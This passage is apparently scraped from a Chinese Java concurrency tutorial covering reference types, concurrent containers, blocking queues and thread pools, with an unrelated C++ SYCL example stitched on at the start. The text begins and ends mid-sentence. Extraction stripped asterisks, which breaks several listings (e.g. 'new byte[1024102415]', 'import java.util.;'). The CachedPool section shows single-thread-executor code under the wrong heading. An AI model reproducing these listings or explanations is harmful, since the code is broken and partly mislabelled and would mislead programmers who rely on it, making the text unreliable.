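Several listings earlier in this article lost their '*' and '#' characters during extraction. As a compact reference, here is a standalone, cleanly formatted USM example of the same in-order-queue pattern — my own minimal hedged sketch, not the course's exact code:

// Minimal USM example mirroring the exercises above.
#include <CL/sycl.hpp>
#include <iostream>
using namespace sycl;

int main() {
    constexpr int N = 1024;
    queue q{property::queue::in_order()};  // kernels on q execute sequentially
    int *data = malloc_shared<int>(N, q);  // accessible from host and device
    for (int i = 0; i < N; i++) data[i] = 10;

    q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 2; });
    q.parallel_for(range<1>(N), [=](id<1> i) { data[i] += 3; });
    q.wait();  // block the host until both kernels finish

    std::cout << data[0] << "\n";  // every element is now 15
    free(data, q);
    return 0;
}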
2023-07-22 10:28:50
321
转载
转载文章
...圾回收try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(m.get());//再分配一个数组,heap将装不下,这时候系统会垃圾回收,先回收一次,如果不够,会把软引用干掉byte[] b = new byte[1024102415];System.out.println(m.get());} }//软引用非常适合缓存使用 2、弱引用 public class M {@Overrideprotected void finalize() throws Throwable {System.out.println("finalize");} } 上图中,tl对象强引用指向ThreadLocal,map中key弱引用指向ThreadLocal,当tl=null时,强引用消失,此时弱引用也将自动被回收,但是此时key=null,value指向10M这个就永远访问不到,既内存泄露 下图中,18行到20行为解决内存泄露问题的,那就是通过remove()将它消除了 / 弱引用遭到gc就会回收/import java.lang.ref.WeakReference;public class T03_WeakReference {public static void main(String[] args) {WeakReference<M> m = new WeakReference<>(new M());System.out.println(m.get());System.gc();System.out.println(m.get());ThreadLocal<M> tl = new ThreadLocal<>();tl.set(new M());tl.remove();} } 3、虚引用 虚引用 虚引用不是给开发人员用的,一般是给写JVM(java虚拟机,没有它java程序运行不了),Netty等技术大牛用的 虚引用,对象当被回收时,会将其放在队列中,此时我们监听到队列中有新值了,就知道有虚引用被回收了 此时我们要做相应的处理,虚引用指向的值,是无法直接get()获取的 虚引用使用场景 一般情况(其它情况暂时没什么用),虚引用指向堆外内存(直接被操作系统管理的内存),JVM无法对其回收 当虚引用对象被回收时,JVM的垃圾回收无法自动回收堆外内存, 但是此时,虚引用对象被回收,会将其放在队列中 操作人员,看到队列中有对象被回收,就进行相应操作,回收堆内存 如何回收堆外内存 C和C++有函数可以用 java现在也提供了Unsafe类可以操作堆外内存,具体请参考上一篇博客,总之,JDK1.8只能通过反射来用,JDK1.9以上可以通过new Unsafe对象来用 Unsafe类的方法有: copyMemory():直接访问内存 allocateMemory():直接分配内存,这就必须手动回收内存了 freeMemory():回收内存 下面是一个虚引用例子,自己看吧,懂得自然懂,现在看不懂的,先收藏或者保存上,以后回来看 / 一个对象是否有虚引用的存在,完全不会对其生存时间构成影响, 也无法通过虚引用来获取一个对象的实例。 为一个对象设置虚引用关联的唯一目的就是能在这个对象被收集器回收时收到一个系统通知。 虚引用和弱引用对关联对象的回收都不会产生影响,如果只有虚引用活着弱引用关联着对象, 那么这个对象就会被回收。它们的不同之处在于弱引用的get方法,虚引用的get方法始终返回null, 弱引用可以使用ReferenceQueue,虚引用必须配合ReferenceQueue使用。 jdk中直接内存的回收就用到虚引用,由于jvm自动内存管理的范围是堆内存, 而直接内存是在堆内存之外(其实是内存映射文件,自行去理解虚拟内存空间的相关概念), 所以直接内存的分配和回收都是有Unsafe类去操作,java在申请一块直接内存之后, 会在堆内存分配一个对象保存这个堆外内存的引用, 这个对象被垃圾收集器管理,一旦这个对象被回收, 相应的用户线程会收到通知并对直接内存进行清理工作。 事实上,虚引用有一个很重要的用途就是用来做堆外内存的释放, DirectByteBuffer就是通过虚引用来实现堆外内存的释放的。/import java.lang.ref.PhantomReference;import java.lang.ref.Reference;import java.lang.ref.ReferenceQueue;import java.util.LinkedList;import java.util.List;public class T04_PhantomReference {private static final List<Object> LIST = new LinkedList<>();private static final ReferenceQueue<M> QUEUE = new ReferenceQueue<>();public static void main(String[] args) {PhantomReference<M> phantomReference = new PhantomReference<>(new M(), QUEUE);new Thread(() -> {while (true) {LIST.add(new byte[1024 1024]);try {Thread.sleep(1000);} catch (InterruptedException e) {e.printStackTrace();Thread.currentThread().interrupt();}System.out.println(phantomReference.get());} }).start();new Thread(() -> {while (true) {Reference<? 
extends M> poll = QUEUE.poll();if (poll != null) {System.out.println("--- 虚引用对象被jvm回收了 ---- " + poll);} }}).start();try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();} }} 2、容器 1、发展历史(一定要了解) map容器你需要了解的历史 JDK早期,java提供了Vector和Hashtable两个容器,这两个容器,很多操作都加了锁Synchronized,对于某些不需要用锁的情况下,就显得十分影响性能,所以现在基本没人用这两个容器,但是面试经常问这两个容器里面的数据结构等内容 后来,出现了HashMap,此容器完全不加锁,是用的最多的容器 但是完全不加锁未免不完善,所以java提供了如下方式,将HashMap变为加锁的 //通过Collections.synchronizedMap(HashMap)方法,将其变为加锁Map集合,其中泛型随意,UUID只是举例。static Map<UUID, UUID> m = Collections.synchronizedMap(new HashMap<UUID, UUID>()); 通过阅读源码发现,上面方法将HashMap变为加锁,也是使用Synchronized,只是锁的内容更细,但并不比HashTable效率高多少 所以衍生除了新的容器ConcurrentHashMap ConcurrentHashMap 此容器,插入效率不如上面的,因为它做了各种判断和CAS,但是差距不是特别大 读取效率很高,100个线程同时访问,每个线程读取一百万次实测 Hashtable 39s ,SynchronizedHashMap 38s ,ConcurrentHashMap 1.7s 前两个将近40秒,ConcurrentHashMap只需要不到2s,由此可见此容器读取效率极高 2、为什么推荐使用Queue来做高并发 为什么推荐Queue(队列) Queue接口提供了很多针对多线程非常友好的API(offer ,peek和poll,其中BlockingQueue还添加了put和take可以阻塞),可以说专门为多线程高并发而创造的接口,所以一般我们使用Queue而不用List 以下代码分别使用链表LinkList和ConcurrentQueue,对比一下速度 LinkList用了5s多,ConcurrentQueue几乎瞬间完成 Concurrent接口就是专为多线程设计,多线程设计要多考虑Queue(高并发用)的使用,少使用List / 有N张火车票,每张票都有一个编号 同时有10个窗口对外售票 请写一个模拟程序 分析下面的程序可能会产生哪些问题? 重复销售?超量销售? 使用Vector或者Collections.synchronizedXXX 分析一下,这样能解决问题吗? 就算操作A和B都是同步的,但A和B组成的复合操作也未必是同步的,仍然需要自己进行同步 就像这个程序,判断size和进行remove必须是一整个的原子操作 @author 马士兵/import java.util.LinkedList;import java.util.List;import java.util.concurrent.TimeUnit;public class TicketSeller3 {static List<String> tickets = new LinkedList<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {synchronized(tickets) {if(tickets.size() <= 0) break;try {TimeUnit.MILLISECONDS.sleep(10);} catch (InterruptedException e) {e.printStackTrace();}System.out.println("销售了--" + tickets.remove(0));} }}).start();} }} 队列 import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class TicketSeller4 {static Queue<String> tickets = new ConcurrentLinkedQueue<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {String s = tickets.poll();if(s == null) break;else System.out.println("销售了--" + s);} }).start();} }} 3、多线程常用容器 1、ConcurrentHashMap(无序)和ConcurrentSkipListMap(有序,链表,使用跳表数据结构,让查询更快) 跳表:http://blog.csdn.net/sunxianghuang/article/details/52221913 import java.util.;import java.util.concurrent.ConcurrentHashMap;import java.util.concurrent.ConcurrentSkipListMap;import java.util.concurrent.CountDownLatch;public class T01_ConcurrentMap {public static void main(String[] args) {Map<String, String> map = new ConcurrentHashMap<>();//Map<String, String> map = new ConcurrentSkipListMap<>(); //高并发并且排序//Map<String, String> map = new Hashtable<>();//Map<String, String> map = new HashMap<>(); //Collections.synchronizedXXX//TreeMapRandom r = new Random();Thread[] ths = new Thread[100];CountDownLatch latch = new CountDownLatch(ths.length);long start = System.currentTimeMillis();for(int i=0; i<ths.length; i++) {ths[i] = new Thread(()->{for(int j=0; j<10000; j++) map.put("a" + r.nextInt(100000), "a" + r.nextInt(100000));latch.countDown();});}Arrays.asList(ths).forEach(t->t.start());try {latch.await();} catch (InterruptedException e) {e.printStackTrace();}long end = System.currentTimeMillis();System.out.println(end - start);System.out.println(map.size());} } 2、CopyOnWriteList(写时复制)和CopyOnWriteSet 适用于,高并发是,读的多,写的少的情况 
当我们写的时候,将容器复制,让写线程去复制的线程写(写的时候加锁) 而读线程依旧去读旧的(读的时候不加锁) 当写完,将对象指向复制后的已经写完的容器,原来容器销毁 大大提高读的效率 / 写时复制容器 copy on write 多线程环境下,写时效率低,读时效率高 适合写少读多的环境 @author 马士兵/import java.util.ArrayList;import java.util.Arrays;import java.util.List;import java.util.Random;import java.util.Vector;import java.util.concurrent.CopyOnWriteArrayList;public class T02_CopyOnWriteList {public static void main(String[] args) {List<String> lists = //new ArrayList<>(); //这个会出并发问题!//new Vector();new CopyOnWriteArrayList<>();Random r = new Random();Thread[] ths = new Thread[100];for(int i=0; i<ths.length; i++) {Runnable task = new Runnable() {@Overridepublic void run() {for(int i=0; i<1000; i++) lists.add("a" + r.nextInt(10000));} };ths[i] = new Thread(task);}runAndComputeTime(ths);System.out.println(lists.size());}static void runAndComputeTime(Thread[] ths) {long s1 = System.currentTimeMillis();Arrays.asList(ths).forEach(t->t.start());Arrays.asList(ths).forEach(t->{try {t.join();} catch (InterruptedException e) {e.printStackTrace();} });long s2 = System.currentTimeMillis();System.out.println(s2 - s1);} } 3、synchronizedList和ConcurrentLinkedQueue package com.mashibing.juc.c_025;import java.util.ArrayList;import java.util.Collections;import java.util.List;import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class T04_ConcurrentQueue {public static void main(String[] args) {List<String> strsList = new ArrayList<>();List<String> strsSync = Collections.synchronizedList(strsList);//加锁ListQueue<String> strs = new ConcurrentLinkedQueue<>();//Concurrent链表队列,就是读快for(int i=0; i<10; i++) {strs.offer("a" + i); //add添加,但是不同点是,此方法会返回一个布尔值}System.out.println(strs);System.out.println(strs.size());System.out.println(strs.poll());//取出,取完后将元素去除System.out.println(strs.size());System.out.println(strs.peek());//取出,但是不会将元素从队列删除System.out.println(strs.size());//双端队列Deque} } 4、LinkedBlockingQueue 链表阻塞队列(无界链表,可以一直装东西,直到内存满(其实,也不是无限,其长度Integer.MaxValue就是上限,毕竟最大就这么大)) 主要体现在put和take方法,put添加的时候,如果队列满了,就阻塞当前线程,直到队列有空位,继续插入。take方法取的时候,如果没有值,就阻塞,等有值了,立马去取 import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.LinkedBlockingQueue;import java.util.concurrent.TimeUnit;public class T05_LinkedBlockingQueue {static BlockingQueue<String> strs = new LinkedBlockingQueue<>();static Random r = new Random();public static void main(String[] args) {new Thread(() -> {for (int i = 0; i < 100; i++) {try {strs.put("a" + i); //如果满了,当前线程就会等待(实现阻塞),等多会有空位,将值插入TimeUnit.MILLISECONDS.sleep(r.nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();} }}, "p1").start();for (int i = 0; i < 5; i++) {new Thread(() -> {for (;;) {try {System.out.println(Thread.currentThread().getName() + " take -" + strs.take()); //取内容,如果空了,当前线程就会等待(实现阻塞)} catch (InterruptedException e) {e.printStackTrace();} }}, "c" + i).start();} }} 5、ArrayBlockingQueue 有界阻塞队列(因为Array需要指定长度) import java.util.Random;import java.util.concurrent.ArrayBlockingQueue;import java.util.concurrent.BlockingQueue;import java.util.concurrent.TimeUnit;public class T06_ArrayBlockingQueue {static BlockingQueue<String> strs = new ArrayBlockingQueue<>(10);static Random r = new Random();public static void main(String[] args) throws InterruptedException {for (int i = 0; i < 10; i++) {strs.put("a" + i);}//strs.put("aaa"); //满了就会等待,程序阻塞//strs.add("aaa");//strs.offer("aaa");strs.offer("aaa", 1, TimeUnit.SECONDS);System.out.println(strs);} } 6、特殊的阻塞队列1:DelayQueue 延时队列(按时间进行调度,就是隔多长时间运行,谁隔的少,谁先) 以下例子中,我们添加线程到队列顺序为t12345,正常情况下,会按照顺序运行,但是这里有了延时时间,也就是时间越短,越先执行 
步骤很简单,拿到延时队列 指定构造方法 继承 implements Delayed 重写 compareTo和getDelay import java.util.Calendar;import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.DelayQueue;import java.util.concurrent.Delayed;import java.util.concurrent.TimeUnit;public class T07_DelayQueue {static BlockingQueue<MyTask> tasks = new DelayQueue<>();static Random r = new Random();static class MyTask implements Delayed {String name;long runningTime;MyTask(String name, long rt) {this.name = name;this.runningTime = rt;}@Overridepublic int compareTo(Delayed o) {if(this.getDelay(TimeUnit.MILLISECONDS) < o.getDelay(TimeUnit.MILLISECONDS))return -1;else if(this.getDelay(TimeUnit.MILLISECONDS) > o.getDelay(TimeUnit.MILLISECONDS)) return 1;else return 0;}@Overridepublic long getDelay(TimeUnit unit) {return unit.convert(runningTime - System.currentTimeMillis(), TimeUnit.MILLISECONDS);}@Overridepublic String toString() {return name + " " + runningTime;} }public static void main(String[] args) throws InterruptedException {long now = System.currentTimeMillis();MyTask t1 = new MyTask("t1", now + 1000);MyTask t2 = new MyTask("t2", now + 2000);MyTask t3 = new MyTask("t3", now + 1500);MyTask t4 = new MyTask("t4", now + 2500);MyTask t5 = new MyTask("t5", now + 500);tasks.put(t1);tasks.put(t2);tasks.put(t3);tasks.put(t4);tasks.put(t5);System.out.println(tasks);for(int i=0; i<5; i++) {System.out.println(tasks.take());//获取的是toString方法返回值} }} 7、特殊的阻塞队列2:PriorityQueque 优先队列(二叉树算法,就是排序) import java.util.PriorityQueue;public class T07_01_PriorityQueque {public static void main(String[] args) {PriorityQueue<String> q = new PriorityQueue<>();q.add("c");q.add("e");q.add("a");q.add("d");q.add("z");for (int i = 0; i < 5; i++) {System.out.println(q.poll());} }} 8、特殊的阻塞队列3:SynchronusQueue 同步队列(线程池用处非常大) 此队列容量为0,当插入元素时,必须同时有个线程往外取 就是说,当你往这个队列里面插入一个元素,它就拿着这个元素站着(阻塞),直到有个取元素的线程来,它就把元素交给它 就是用来同步数据的,也就是线程间交互数据用的一个特殊队列 package com.mashibing.juc.c_025;import java.util.concurrent.BlockingQueue;import java.util.concurrent.SynchronousQueue;public class T08_SynchronusQueue { //容量为0public static void main(String[] args) throws InterruptedException {BlockingQueue<String> strs = new SynchronousQueue<>();new Thread(()->{//这个线程就是消费者,来取值try {System.out.println(strs.take());//和同步队列要值} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.put("aaa"); //阻塞等待消费者消费,就拿着aaa站着,等线程来取//strs.put("bbb");//strs.add("aaa");System.out.println(strs.size());} } 9、特殊的阻塞队列4:TransferQueue 传递队列 此队列加入了一个方法transfer()用来向队列添加元素 但是和put()方法不同的是,put添加完元素就走了 而这个方法,添加完自己就阻塞了,直到有人将这个元素取走,它才继续工作(省去我们手动阻塞) import java.util.concurrent.LinkedTransferQueue;public class T09_TransferQueue {public static void main(String[] args) throws InterruptedException {LinkedTransferQueue<String> strs = new LinkedTransferQueue<>();new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.transfer("aaa");//放东西到队列,同时阻塞等待消费者线程,取走元素//strs.put("aaa");//如果用put就和普通队列一样,放完东西就走了/new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();/} } 3、线程池 线程池 由于单独创建线程,十分影响效率,而且无法对线程集中管理,一旦疏落,可能线程无限执行,浪费资源 线程池就是一个存储线程的游泳池,而每个线程就是池子里面的赛道 池子里的线程不执行任何任务,只是提供一个资源 而谁提交了任务,比如我想来游泳,那么池子就给你一个赛道,让你游泳 比如它想练憋气,那么给它一个赛道练憋气 当他们用完,走了,那么后面其它人再过来继续用 这就是线程池,始终只有这几个线程,不做实现,而是借用这几个线程的用户,自己掌控用这些线程资源做什么(提交任务给线程,线程空闲就帮他们完成任务) 线程池的两种类型(两类,不是两个) ThreadPoolExecutor(简称TPE) ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) Executors(注意这后面有s) 
它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 1、常用类 Executor ExecutorService 扩展了execute方法,具有一个返回值 规定了异步执行机制,提供了一些执行器方法,比如shutdown()关闭等 但是它不知道执行器中的线程何时执行完 Callable 对Runnable进行了扩展,实现Callable的调用,可以有返回值,表示线程的状态 但是无法返回线程执行结果 Future 获得未来线程执行结果 由此,我们可以得知线程池基本的一个使用步骤 其中service.submit():为异步提交,也就是说,主线程该干嘛干嘛,我是异步执行的,和同步不一样(当前线程执行完,主线程才能继续执行,叫同步) futuer.get():获取结果集结果,此时因为异步,主线程执行到这里,结果集可能还没封装好,所以此时如果没有值,就阻塞,直到结果集出来 public static void main(String[] args) throws ExecutionException, InterruptedException {Callable<String> c = new Callable() {@Overridepublic String call() throws Exception {return "Hello Callable";} };ExecutorService service = Executors.newCachedThreadPool();Future<String> future = service.submit(c); //异步System.out.println(future.get());//阻塞service.shutdown();} 2、FutureTask 可充当任务的结果集 上面我们介绍Future是用来得到任务的执行结果的 而FutureTask,可以当做一个任务用,并且返回任务的结果,也就是可以跑线程,然后还可以得到线程结果 public static void main(String[] args) throws InterruptedException, ExecutionException {FutureTask<Integer> task = new FutureTask<>(()->{TimeUnit.MILLISECONDS.sleep(500);return 1000;}); //new Callable () { Integer call();}new Thread(task).start();System.out.println(task.get()); //阻塞} 3、CompletableFuture 非常灵活的任务结果集 一个非常灵活的结果集 他可以将很多执行不同任务的线程的结果进行汇总 比如一个网站,它可以启动多个线程去各大电商网站,比如淘宝,京东,收集某些或某一个商品的价格 最后,将获取的数据进行整合封装 最终,客户就可以通过此网站,获取某类商品在各网站的价格信息 / 假设你能够提供一个服务 这个服务查询各大电商网站同一类产品的价格并汇总展示 @author 马士兵 http://mashibing.com/import java.io.IOException;import java.util.Random;import java.util.concurrent.CompletableFuture;import java.util.concurrent.ExecutionException;import java.util.concurrent.TimeUnit;public class T06_01_CompletableFuture {public static void main(String[] args) throws ExecutionException, InterruptedException {long start, end;/start = System.currentTimeMillis();priceOfTM();priceOfTB();priceOfJD();end = System.currentTimeMillis();System.out.println("use serial method call! " + (end - start));/start = System.currentTimeMillis();CompletableFuture<Double> futureTM = CompletableFuture.supplyAsync(()->priceOfTM());CompletableFuture<Double> futureTB = CompletableFuture.supplyAsync(()->priceOfTB());CompletableFuture<Double> futureJD = CompletableFuture.supplyAsync(()->priceOfJD());CompletableFuture.allOf(futureTM, futureTB, futureJD).join();//当所有结果集都获取到,才汇总阻塞CompletableFuture.supplyAsync(()->priceOfTM()).thenApply(String::valueOf).thenApply(str-> "price " + str).thenAccept(System.out::println);end = System.currentTimeMillis();System.out.println("use completable future! 
" + (end - start));try {System.in.read();} catch (IOException e) {e.printStackTrace();} }private static double priceOfTM() {delay();return 1.00;}private static double priceOfTB() {delay();return 2.00;}private static double priceOfJD() {delay();return 3.00;}/private static double priceOfAmazon() {delay();throw new RuntimeException("product not exist!");}/private static void delay() {int time = new Random().nextInt(500);try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.printf("After %s sleep!\n", time);} } 4、TPE型线程池1:ThreadPoolExecutor 原理及其参数 线程池由两个集合组成,一个集合存储线程,一个集合存储任务 存储线程:可以规定大小,最多可以有多少个,以及指定核心线程数量(不会被回收) 任务队列:存储任务 细节:初始线程池没有线程,当有一个任务来,线程池起一个线程,又有一个任务来,再起一个线程,直到达到核心线程数量 核心线程数量达到时,新来的任务将存储到任务队列中等待核心线程处理完成,直到任务队列也满了 当任务队列满了,此时再次启动一个线程(非核心线程,一旦空闲,达到指定时间将会消失),直到达到线程最大数量 当线程容器和任务容器都满了,又来了线程,将会执行拒绝策略 上面的细节涉及的所有步骤内容,均由创建线程池的参数执行 下面是ThreadPoolExecutor构造方法参数的源码注释 / 用给定的初始值,创建一个新的线程池 @param corePoolSize 核心线程数量 @param maximumPoolSize 最大线程数量 @param keepAliveTime 当线程数大于核心线程数量时,空闲的线程可生存的时间 @param unit 时间单位 @param workQueue 任务队列,只能包含由execute提交的Runnable任务 @param threadFactory 工厂,用于创建线程给线程池调度的工厂,可以自定义 @param handler 拒绝策略(可以自定义,JDK默认提供4种),当线程边界和队列容量已经满了,新来线程被阻塞时使用的处理程序/public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) JDK提供的4种拒绝策略,不常用,一般都是自己定义拒绝策略 Abort:抛异常 Discard:扔掉,不抛异常 DiscardOldest:扔掉排队时间最久的(将队列中排队时间最久的扔掉,然后让新来的进来) CallerRuns:调用者处理任务(谁通过execute方法提交任务,谁处理) ThreadPoolExecutor继承关系 继承关系:ThreadPoolExecutor->AbstractExectorService类->ExectorService接口->Exector接口 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面创建线程池,哪里用到了它 使用实例 import java.io.IOException;import java.util.concurrent.;public class T05_00_HelloThreadPool {static class Task implements Runnable {private int i;public Task(int i) {this.i = i;}@Overridepublic void run() {System.out.println(Thread.currentThread().getName() + " Task " + i);try {System.in.read();} catch (IOException e) {e.printStackTrace();} }@Overridepublic String toString() {return "Task{" +"i=" + i +'}';} }public static void main(String[] args) {ThreadPoolExecutor tpe = new ThreadPoolExecutor(2, 4,60, TimeUnit.SECONDS,new ArrayBlockingQueue<Runnable>(4),Executors.defaultThreadFactory(),new ThreadPoolExecutor.CallerRunsPolicy());//创建线程池,核心2个,最大4个,空闲线程存活时间60s,任务队列容量4,使用默认线程工程,创建线程。拒绝策略是JDK提供的for (int i = 0; i < 8; i++) {tpe.execute(new Task(i));//供提交8次任务}System.out.println(tpe.getQueue());//查看任务队列tpe.execute(new Task(100));//提交新的任务System.out.println(tpe.getQueue());tpe.shutdown();//关闭线程池} } 5、TPE型线程池2:SingleThreadPool 单例线程池(只有一个线程) 为什么有单例线程池 有任务队列,有线程池管理机制 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面哪里用到了它 /创建单例线程池,扔5个任务进去,查看输出结果,看看有几个线程执行任务/import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();for(int i=0; i<5; i++) {final int j = i;service.execute(()->{System.out.println(j + " " + Thread.currentThread().getName());});} }} 6、TPE型线程池3:CachedPool 缓存,存储线程池 此线程池没有核心线程,来一个任务启动一个线程(最多Integer.MaxValue,不会放在任务队列,因为任务队列容量为0),每个线程空闲后,只能活60s 实例 import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();//通过Executors获取池子for(int i=0; i<5; i++) {final int j = 
i;service.execute(()->{//提交任务System.out.println(j + " " + Thread.currentThread().getName());});}service.shutdown();} } 7、TPE型线程池4:FixedThreadPool 固定线程池 此线次池,用于创建一个固定线程数量的线程池,不会回收 实例 import java.util.ArrayList;import java.util.List;import java.util.concurrent.Callable;import java.util.concurrent.ExecutionException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.Future;public class T09_FixedThreadPool {public static void main(String[] args) throws InterruptedException, ExecutionException {//并发执行long start = System.currentTimeMillis();getPrime(1, 200000); long end = System.currentTimeMillis();System.out.println(end - start);//输出并发执行耗费时间final int cpuCoreNum = 4;//并行执行ExecutorService service = Executors.newFixedThreadPool(cpuCoreNum);MyTask t1 = new MyTask(1, 80000); //1-5 5-10 10-15 15-20MyTask t2 = new MyTask(80001, 130000);MyTask t3 = new MyTask(130001, 170000);MyTask t4 = new MyTask(170001, 200000);Future<List<Integer>> f1 = service.submit(t1);Future<List<Integer>> f2 = service.submit(t2);Future<List<Integer>> f3 = service.submit(t3);Future<List<Integer>> f4 = service.submit(t4);start = System.currentTimeMillis();f1.get();f2.get();f3.get();f4.get();end = System.currentTimeMillis();System.out.println(end - start);//输出并行耗费时间}static class MyTask implements Callable<List<Integer>> {int startPos, endPos;MyTask(int s, int e) {this.startPos = s;this.endPos = e;}@Overridepublic List<Integer> call() throws Exception {List<Integer> r = getPrime(startPos, endPos);return r;} }static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;}static List<Integer> getPrime(int start, int end) {List<Integer> results = new ArrayList<>();for(int i=start; i<=end; i++) {if(isPrime(i)) results.add(i);}return results;} } 8、TPE型线程池5:ScheduledPool 预定,延时线程池 根据延时时间(隔多长时间后运行),排序,哪个线程先执行,用户只需要指定核心线程数量 此线程池返回的池对象,和提交任务方法都不一样,比较涉及到时间 import java.util.Random;import java.util.concurrent.Executors;import java.util.concurrent.ScheduledExecutorService;import java.util.concurrent.TimeUnit;public class T10_ScheduledPool {public static void main(String[] args) {ScheduledExecutorService service = Executors.newScheduledThreadPool(4);service.scheduleAtFixedRate(()->{//提交延时任务try {TimeUnit.MILLISECONDS.sleep(new Random().nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();}System.out.println(Thread.currentThread().getName());}, 0, 500, TimeUnit.MILLISECONDS);//指定延时时间和单位,第一个任务延时0毫秒,之后的任务,延时500毫秒} } 9、手写拒绝策略小例子 import java.util.concurrent.;public class T14_MyRejectedHandler {public static void main(String[] args) {ExecutorService service = new ThreadPoolExecutor(4, 4,0, TimeUnit.SECONDS, new ArrayBlockingQueue<>(6),Executors.defaultThreadFactory(),new MyHandler());//将手写拒绝策略传入}static class MyHandler implements RejectedExecutionHandler {//1、继承RejectedExecutionHandler@Overridepublic void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {//2、重写方法//log("r rejected")//伪代码,表示通过log4j.log()报一下日志,拒绝的时间,线程名//save r kafka mysql redis//可以尝试保存队列//try 3 times //可以尝试几次,比如3次,重新去抢队列,3次还不行就丢弃if(executor.getQueue().size() < 10000) {//尝试条件,如果size>10000了,就执行拒绝策略//try put again();//如果小于10000,尝试将其放到队列中} }} } 10、ForkJoinPool线程池1:ForkJoinPool 前面我们讲过线程分为两大类,TPE和FJP ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) 适合将大任务切分成多个小任务运行 两个方法,fork():分子任务,将子任务分配到线程池中 join():当前任务的计算结果,如果有子任务,等子任务结果返回后再汇总 下面实例实现,一百万个随机数求和,由两种方法实现,一种ForkJoinPool分任务并行,一种使用单线程做 import java.io.IOException;import java.util.Arrays;import 
java.util.Random;import java.util.concurrent.ForkJoinPool;import java.util.concurrent.RecursiveAction;import java.util.concurrent.RecursiveTask;public class T12_ForkJoinPool {//1000000个随机数求和static int[] nums = new int[1000000];//一堆数static final int MAX_NUM = 50000;//分任务时,每个任务的操作量不能多于50000个,否则就继续细分static Random r = new Random();//使用随机数将数组初始化static {for(int i=0; i<nums.length; i++) {nums[i] = r.nextInt(100);}System.out.println("---" + Arrays.stream(nums).sum()); //stream api 单线程就这么做,一个一个加}//分任务,需要继承,可以继承RecursiveAction(不需要返回值,一般用在不需要返回值的场景)或//RecursiveTask(需要返回值,我们用这个,因为我们需要最后获取求和结果)两个更好实现的类,//他俩继承与ForkJoinTaskstatic class AddTaskRet extends RecursiveTask<Long> {private static final long serialVersionUID = 1L;int start, end;AddTaskRet(int s, int e) {start = s;end = e;}@Overrideprotected Long compute() {if(end-start <= MAX_NUM) {//如果任务操作数小于规定的最大操作数,就进行运算,long sum = 0L;for(int i=start; i<end; i++) sum += nums[i];return sum;//返回结果} //如果分配的操作数大于规定,就继续细分(简单的重中点分,两半)int middle = start + (end-start)/2;//获取中间值AddTaskRet subTask1 = new AddTaskRet(start, middle);//传入起始值和中间值,表示一个子任务AddTaskRet subTask2 = new AddTaskRet(middle, end);//中间值和结尾值,表示一个子任务subTask1.fork();//分任务subTask2.fork();//分任务return subTask1.join() + subTask2.join();//最后返回结果汇总} }public static void main(String[] args) throws IOException {/ForkJoinPool fjp = new ForkJoinPool();AddTask task = new AddTask(0, nums.length);fjp.execute(task);/ForkJoinPool fjp = new ForkJoinPool();//创建线程池AddTaskRet task = new AddTaskRet(0, nums.length);//创建任务fjp.execute(task);//传入任务long result = task.join();//返回汇总结果System.out.println(result);//System.in.read();} } 11、ForkJoinPool线程池2:WorkStealingPool 任务偷取线程池 原来的线程池,都是有一个任务队列,而这个不同,它给每个线程都分配了一个任务队列 当某一个线程的任务队列没有任务,并且自己空闲,它就去其它线程的任务队列中偷任务,所以叫任务偷取线程池 细节:当线程自己从自己的任务队列拿任务时,不需要加锁,但是偷任务时,因为有两个线程,可能发生同步问题,需要加锁 此线程继承FJP 实例 import java.io.IOException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.TimeUnit;public class T11_WorkStealingPool {public static void main(String[] args) throws IOException {ExecutorService service = Executors.newWorkStealingPool();System.out.println(Runtime.getRuntime().availableProcessors());service.execute(new R(1000));service.execute(new R(2000));service.execute(new R(2000));service.execute(new R(2000)); //daemonservice.execute(new R(2000));//由于产生的是精灵线程(守护线程、后台线程),主线程不阻塞的话,看不到输出System.in.read(); }static class R implements Runnable {int time;R(int t) {this.time = t;}@Overridepublic void run() {try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(time + " " + Thread.currentThread().getName());} }} 12、流式API:ParallelStreamAPI 不懂的请参考:https://blog.csdn.net/grd_java/article/details/110265219 实例 import java.util.ArrayList;import java.util.List;import java.util.Random;public class 